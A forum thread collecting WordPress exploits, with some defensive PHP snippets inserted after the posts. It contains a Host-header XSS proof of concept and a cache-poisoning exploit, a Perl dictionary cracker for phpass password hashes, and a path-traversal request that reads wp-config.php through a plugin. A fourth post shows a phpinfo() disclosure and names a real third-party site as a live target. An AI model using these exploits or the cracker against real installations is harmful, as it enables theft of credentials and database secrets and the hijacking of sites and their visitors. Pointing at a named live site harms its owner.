WordPress<=2.6.3 XSS vulnerability in RSS Feed Generator
  #1  
29.11.2008, 01:31
M4g
Forum member
Registered: 08.05.2007
Posts: 164
Reputation: 784

Quote:
===== noXSS.org Security Advisory ======

Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <jr (at) noxss (dot) org [email concealed]>
Published: 2008/11/25
Affected: WordPress < 2.6.5

Summary
=======

WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prone to XSS
attacks.

Web Sites running in a name based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover we only found installations running on the Apache web server
to be affected.

Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
    echo 'http'
        . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
        . $_SERVER['HTTP_HOST']
        . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.

PoC
====

The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:

curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --
...
<atom:link href="http://\">
<body onload=alert(String.fromCharCode(88,83,83))>
/blog/feed" rel="self" type="application/rss+xml" />
...
-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.

Exploit
=======

The following exploit is a semi-stored XSS attack and has been tested
with the following setup:

- Apache 2.x with IP based virtual hosting
- Wordpress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation
will lead to a file containing the XSS to be generated and placed
within the document root.

Request:
curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed

Generated file:
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even though the feed is
XML because the file is served as text/html.

The only missing step is the calculation of the cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5("\"><body onload=alert(String.fromCharCode(88,83,83))>"."/blog/feed"), "\n";'

In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.

Vendor Response
===============
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5
http://www.securityfocus.com/archive/1/498652
 
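Added example, not code from the advisory or from WordPress: a self_link() variant that refuses to reflect the raw Host header into the feed. The function name and $site_host (the host part of the configured site URL) are assumptions of this example.

```php
<?php
// Added example, not WordPress code: a self_link() variant that never reflects
// the raw Host header into the feed. $site_host (host part of the configured
// site URL) and the function name are assumptions of this example.

function safe_self_link(array $server, string $site_host): string
{
    $host = $server['HTTP_HOST'] ?? '';
    // A well-formed hostname (optionally with a port) cannot contain the quote,
    // angle-bracket or space characters the advisory's PoC relies on ...
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?';
    $valid = preg_match("/^{$label}(?:\\.{$label})*(?::\\d{1,5})?$/", $host) === 1;
    // ... and it must also equal the configured host, so that an arbitrary but
    // well-formed Host value is not reflected either (default-vhost setups).
    if (!$valid || strcasecmp($host, $site_host) !== 0) {
        $host = $site_host;
    }
    $scheme = (($server['HTTPS'] ?? '') === 'on') ? 'https' : 'http';
    $uri = $server['REQUEST_URI'] ?? '/';
    // Escape for the XML attribute context the value is written into.
    return htmlspecialchars($scheme . '://' . $host . $uri, ENT_QUOTES | ENT_XML1, 'UTF-8');
}

// Constructed request mirroring the advisory's PoC Host header.
$request = [
    'HTTP_HOST'   => '"><body onload=alert(String.fromCharCode(88,83,83))>',
    'REQUEST_URI' => '/blog/feed',
];
echo '<atom:link href="' . safe_self_link($request, 'www.example.org')
    . '" rel="self" type="application/rss+xml" />', "\n";
```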

Wordpress 2.7 PasswordHash Attack Tool
  #2  
22.12.2008, 22:00
Fugitif
Regular
Registered: 23.09.2007
Posts: 416
Reputation: 869

Wordpress 2.7 PasswordHash Attack Tool

Code:
#!/usr/bin/perl -w
#################################################################
# Wordpress 2.7 PasswordHash Attack Tool
# It is based on the "Portable PHP password hashing framework"
# for Wordpress 2.7
# Author: netsoul
# Thanks to Waraxe and m1cr0n
# Contact: netsoul2[at]gmail.com
# ALTO PARANA - PARAGUAY
#################################################################

use strict;
use Digest::MD5 qw(md5 md5_hex);

my $hashP = '$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'; # 12345
my $dictionary = 'mydic.txt'; # Put a dictionary
my $php_version = '5'; # Don't modify if you don't know it

# phpass base-64 alphabet, shared by b64() and EncryptP()
my @itoa64 = ('.', '/', '0'..'9', 'A'..'Z', 'a'..'z');
my $itoa64 = join('', @itoa64);

open(my $f1, '<', $dictionary) || die "Error in open file!.\n";
# a portable hash is "$P$" + cost char + 8 salt chars + 22 hash chars = 34 chars
$hashP =~ m{^(\$P\$[/a-zA-Z0-9.]+)};
die "Bad hash!\n" if !defined $1 || length($1) != 34;
my ($salt, $hash) = $hashP =~ m/^(.{0,12})(.+)/;   # setting (12 chars) and digest
my ($header) = $salt =~ m/^(.{0,3})/;               # "$P$"
while (<$f1>) {
    chomp($_);
    print "Current Password: $_\r";
    my $found = &finder($_, $salt, $hash);
    print "\nPassword FOUND: $_" and last if $found;
    print "\nPassword NOT FOUND:" if eof;
}
close $f1;

# phpass encode64(): 3 input bytes -> 4 alphabet characters
sub b64 {
    my ($input, $count) = @_;
    my @input = split(//, $input);
    my $output = '';
    my $i = 0;
    do {
        my $value = ord($input[$i++]);
        $output .= $itoa64[$value & 0x3f];
        if ($i < $count) {
            $value |= ord($input[$i]) << 8;
        }
        $output .= $itoa64[($value >> 6) & 0x3f];
        if ($i++ >= $count) {
            return $output;
        }
        if ($i < $count) {
            $value |= ord($input[$i]) << 16;
        }
        $output .= $itoa64[($value >> 12) & 0x3f];
        return $output if $i++ >= $count;
        $output .= $itoa64[($value >> 18) & 0x3f];
    } while ($i < $count);
    return $output;
}

# phpass crypt_private(): iterated MD5 over salt.password, then hash.password
sub EncryptP {
    my ($password, $setting) = @_;
    my @setting = split(//, $setting);
    my $hash;
    my $output = '*0';
    $output = '*1' if substr($setting, 0, 2) eq $output;
    return $output if substr($setting, 0, 3) ne $header;
    my $count_log2 = index($itoa64, $setting[3]);
    if ($count_log2 < 7 || $count_log2 > 30) {
        return $output;
    }
    my $count = 1 << $count_log2;
    my $salt = substr($setting, 4, 8);
    return $output if length($salt) != 8;
    if ($php_version >= '5') {
        # PHP 5: md5() with raw binary output
        $hash = md5($salt . $password);
        do {
            $hash = md5($hash . $password);
        } while (--$count);
    } else {
        # PHP 4: hex md5 packed back into raw bytes
        $hash = pack('H*', md5_hex($salt . $password));
        do {
            $hash = pack('H*', md5_hex($hash . $password));
        } while (--$count);
    }
    $output = substr($setting, 0, 12);
    $output .= &b64($hash, 16);
    return $output;
}

sub HashP {
    my ($password, $salt) = @_;
    my $hash = &EncryptP($password, $salt);
    return $hash if length($hash) == 34;
}

sub CheckP {
    my ($password, $stored_hash) = @_;
    return &EncryptP($password, $stored_hash);
}

sub finder {
    my ($password, $salt, $hash) = @_;
    my $output = &CheckP($password, &HashP($password, $salt));
    return $output eq $salt . $hash;
}
 
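Added example, not part of the posted tool: a PHP routine that parses a WordPress/phpass portable hash using the same alphabet and limits the Perl code above encodes (itoa64, count_log2 between 7 and 30, 34-character hash) and reports its cost, so that stored hashes with a low iteration count can be found during an audit. The function names and the 2^13 floor are assumptions of this example.

```php
<?php
// Added example (not part of the posted tool): inspect a phpass portable hash
// ("$P$" or "$H$") and report its cost factor for auditing purposes.
// Function names and the cost floor are assumptions of this example.

function phpass_inspect(string $stored): ?array
{
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    // "$P$" + 1 cost char + 8 salt chars + 22 digest chars = 34 characters.
    if (strlen($stored) !== 34 || !in_array(substr($stored, 0, 3), ['$P$', '$H$'], true)) {
        return null;
    }
    // The 4th character is the base-2 logarithm of the iteration count.
    $countLog2 = strpos($itoa64, $stored[3]);
    if ($countLog2 === false || $countLog2 < 7 || $countLog2 > 30) {
        return null; // phpass itself refuses such settings
    }
    $salt = substr($stored, 4, 8);
    $digest = substr($stored, 12);
    if (strspn($salt . $digest, $itoa64) !== 30) {
        return null; // characters outside the phpass base-64 alphabet
    }
    return [
        'cost_log2'  => $countLog2,
        'iterations' => 1 << $countLog2,
        'salt'       => $salt,
    ];
}

// Flag hashes whose cost is below a chosen floor (assumed floor: 2^13 rounds).
// Malformed hashes are flagged too, since they cannot be verified at all.
function phpass_is_weak_cost(string $stored, int $minLog2 = 13): bool
{
    $info = phpass_inspect($stored);
    return $info === null || $info['cost_log2'] < $minLog2;
}

// The sample hash from the posted tool: cost character 'B' is index 13 in itoa64.
var_dump(phpass_inspect('$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'));
var_dump(phpass_is_weak_cost('$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'));
// Constructed variant whose cost character '7' is index 9, below the floor.
var_dump(phpass_is_weak_cost('$P$7S5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'));
```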

WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
  #3  
30.05.2010, 12:32
RulleR
Reservists Of Antichat - Level 6
Registered: 12.06.2008
Posts: 157
Reputation: 1668

Plugin name: jRSS Widget
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP code:
header('Content-type: application/xml');
// the "url" request parameter goes straight into fopen(): any readable
// local path (or stream wrapper) is opened and echoed back to the client
$handle = fopen($_REQUEST['url'], "r");

if ($handle) {
    while (!feof($handle)) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}

Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php

Last edited by RulleR; 30.05.2010 at 12:34.
 

  #4  
06.06.2010, 03:51
Strilo4ka
Reservists Of Antichat - Level 6
Registered: 05.04.2009
Posts: 231
Reputation: 1148

WP Auctions plugin

Version: 1.7.4
Last Updated: 2010-6-5

Reveals the WordPress version plus phpinfo().

/wp-content/plugins/wp-auctions/wp_auctions.php
PHP code:
/*...*/
// reachable by anyone who requests the plugin file directly with ?debug
if (strstr($_SERVER['PHP_SELF'], PLUGIN_EXTERNAL_PATH.PLUGIN_NAME) && isset($_GET['debug'])):
    echo "Version Number: ".$wpa_version;
    echo "<p>";
    phpinfo();
endif;
/*...*/
Result:
http://[host]/wp-content/plugins/wp-auctions/wp_auctions.php?debug

http://smarz1000.com/wp-content/plugins/wp-auctions/wp_auctions.php?debug

The WordPress version is also shown at the bottom of:
http://[host]/wp-content/plugins/wp-auctions/wp_auctions.php?rss

Paths:
http://[host]/wp-content/plugins/wp-auctions/wpa_resizer.php?image=/

Paths again, in the file:
http://smarz1000.com/wp-content/plugins/wp-auctions/wp_auctions.php?rss

Last edited by Strilo4ka; 06.06.2010 at 04:02.
 
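Added example, not the WP Auctions plugin's own code: the two guards that stop a plugin file from handing version data and phpinfo() output to anonymous visitors who request it directly. The helper name is an assumption; ABSPATH, WP_DEBUG and current_user_can() are WordPress's own.

```php
<?php
// Added example (not the WP Auctions plugin's code). Assumption: $wpa_version
// holds the plugin version, as in the post; wpa_debug_info() is a made-up name.

// 1. Plugin files must only run when loaded by WordPress, never when hit
//    directly by URL. WordPress defines ABSPATH before loading plugins, so a
//    direct request to wp_auctions.php?debug now produces an empty response.
if (!defined('ABSPATH')) {
    exit;
}

// 2. Diagnostics, if they must exist at all, are opt-in via WP_DEBUG and
//    limited to administrators, and phpinfo() is never sent to the browser.
function wpa_debug_info(string $wpa_version): string
{
    if (!(defined('WP_DEBUG') && WP_DEBUG)
        || !function_exists('current_user_can')
        || !current_user_can('manage_options')) {
        return '';
    }
    return 'Version Number: ' . htmlspecialchars($wpa_version, ENT_QUOTES, 'UTF-8');
}

if (isset($_GET['debug'])) {
    echo wpa_debug_info($wpa_version);
}
```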